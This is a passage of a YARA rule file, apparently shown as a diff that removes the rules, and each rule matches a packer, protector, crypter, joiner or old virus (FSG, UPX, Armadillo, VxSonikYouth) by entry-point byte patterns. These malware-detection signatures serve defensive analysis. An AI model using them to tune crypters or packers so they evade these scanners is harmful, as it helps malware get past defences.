-	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule NsPack14byNorthStarLiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }
-
-condition:
-		$a0
-}
-	
-	
-rule FSGv110EngbartxtWatcomCCEXE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AcidCrypt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
-	$a1 = { BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule eXPressorv1451CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 }
-	$a1 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 89 4D CC }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerv100LZMABeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 04 00 00 00 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PackanoidArkanoid
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DAEMONProtectv067
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EmbedPEV100V124cyclotron
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule VProtectorV10Avcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 8A 8E 40 00 68 C6 8E 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPE2200481022005314WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02JDPack1xJDProtect09Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EmbedPEV1Xcyclotron
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPEV220070411WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualBasic60DLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 5A 68 90 90 90 90 68 90 90 90 90 52 E9 90 90 FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPack14Liuxingping
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxTrivial46
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 4E B1 20 BA ?? ?? CD 21 BA ?? ?? B8 ?? 3D CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule STUDRC410JamieEditionScanTimeUnDetectablebyMarjinZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 2C 11 40 00 E8 F0 FF FF FF 00 00 00 00 00 00 30 00 00 00 38 00 00 00 00 00 00 00 37 BB 71 EC A4 E1 98 4C 9B FE 8F 0F FA 6A 07 F6 00 00 00 00 00 00 01 00 00 00 20 20 46 6F 72 20 73 74 75 64 00 20 54 6F 00 00 00 00 06 00 00 00 CC 1A 40 00 07 00 00 00 D4 18 40 00 07 00 00 00 7C 18 40 00 07 00 00 00 2C 18 40 00 07 00 00 00 E0 17 40 00 56 42 35 21 F0 1F 2A 00 00 00 00 00 00 00 00 00 00 00 00 00 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 00 09 04 00 00 00 00 00 00 E8 13 40 00 F4 13 40 00 00 F0 30 00 00 FF FF FF 08 00 00 00 01 00 00 00 00 00 00 00 E9 00 00 00 04 11 40 00 04 11 40 00 C8 10 40 00 78 00 00 00 7C 00 00 00 81 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 61 61 00 53 74 75 64 00 00 73 74 75 64 00 00 01 00 01 00 30 16 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 B4 16 40 00 10 30 40 00 07 00 00 00 24 12 40 00 0E 00 20 00 00 00 00 00 1C 9E 21 00 EC 11 40 00 5C 10 40 00 E4 1A 40 00 2C 34 40 00 68 17 40 00 58 17 40 00 78 17 40 00 8C 17 40 00 8C 10 40 00 62 10 40 00 92 10 40 00 F8 1A 40 00 24 19 40 00 98 10 40 00 9E 10 40 00 77 04 18 FF 04 1C FF 05 00 00 24 01 00 0D 14 00 78 1C 40 00 48 21 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxSonikYouth
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8A 16 02 00 8A 07 32 C2 88 07 43 FE C2 81 FB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXShit006
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SetupFactoryv6003SetupLauncher
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 90 61 40 00 68 70 3B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 14 61 40 00 33 D2 8A D4 89 15 5C 89 40 00 8B C8 81 E1 FF 00 00 00 89 0D 58 89 40 00 C1 E1 08 03 CA 89 0D 54 89 40 00 C1 E8 10 A3 50 89 }
-
-condition:
-		$a0
-}
-	
-	
-rule CrypKeyV61XDLLCrypKeyCanadaInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D ?? ?? ?? ?? 00 75 34 68 ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcAsmProtectorVcAsm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompact2xxSlimLoaderBitSumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ENIGMAProtectorV11V12SukhovVladimir
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorv10bAshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 ?? E8 03 00 00 00 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEDiminisherv01
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 }
-	$a1 = { 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule SOFTWrapperforWin9xNTEvaluationVersion
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov200
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov201
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoinerSmallbuild014021024027GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SDProtector1xRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NSISInstallerNullSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 20 53 55 56 33 DB 57 89 5C 24 18 C7 44 24 10 ?? ?? ?? ?? C6 44 24 14 20 FF 15 30 70 40 00 53 FF 15 80 72 40 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEXv099
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule IMPPacker10MahdiHezavehiIMPOSTER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
-
-condition:
-		$a0
-}
-	
-	
-rule PEProtectv09
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3 }
-	$a1 = { E9 ?? 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 20 28 43 29 6F }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule nbuildv10soft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B9 ?? ?? BB ?? ?? C0 ?? ?? 80 ?? ?? 43 E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01StelthPE101Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 BA ?? ?? ?? ?? FF E2 BA E0 10 40 00 B8 68 24 1A 40 89 02 83 C2 03 B8 40 00 E8 EE 89 02 83 C2 FD FF E2 2D 3D 5B 20 48 69 64 65 50 45 20 5D 3D 2D 90 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule IProtect10FxSubdllmodebyFuXdas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 53 75 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED B6 13 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 A8 13 40 00 8D 85 81 13 40 00 50 FF B5 A8 13 40 00 E8 92 00 00 00 0B C0 74 13 89 85 A4 13 40 00 8D 85 8E 13 40 00 50 FF 95 A4 13 40 00 8B 85 AC 13 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 B5 FA FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSVisualCv8DLLhsmallsig2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B FF 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 0F 84 ?? ?? 00 00 83 FE 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSVisualCv8DLLhsmallsig1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B FF 55 8B EC 83 7D 0C 01 75 05 E8 ?? ?? ?? FF 5D E9 D6 FE FF FF CC CC CC CC CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv16xVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXv20MarkusLaszloReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }
-
-condition:
-		$a0
-}
-	
-	
-rule BladeJoinerv15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv133Engdulekxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF }
-	$a1 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule FSGv13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv120EngdulekxtMicrosoftVisualC6070
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SuperDAT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 40 F3 42 00 68 A4 BF 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 08 F2 42 00 33 D2 8A D4 89 15 60 42 43 00 8B C8 81 E1 FF 00 00 00 89 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv200alpha38
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 80 B8 BF 10 00 10 01 74 7A C6 80 BF 10 00 10 01 9C 55 53 51 57 52 56 8D 98 0F 10 00 10 8B 53 14 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 8B F8 50 8B 33 8B 53 14 03 F2 8B 4B 0C 03 CA 8D 85 B7 10 00 10 FF 73 04 8F }
-
-condition:
-		$a0
-}
-	
-	
-rule RCryptor16cVaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TheGuardLibrary
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeCryptor01build001GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 68 26 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner02BJFNT12Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DingBoysPElockPhantasmv08
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Thinstall2736Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 58 BB F3 1C 00 00 2B C3 50 68 00 00 40 00 68 00 26 00 00 68 CC 00 00 00 E8 C1 FE FF FF E9 97 FF FF FF CC CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 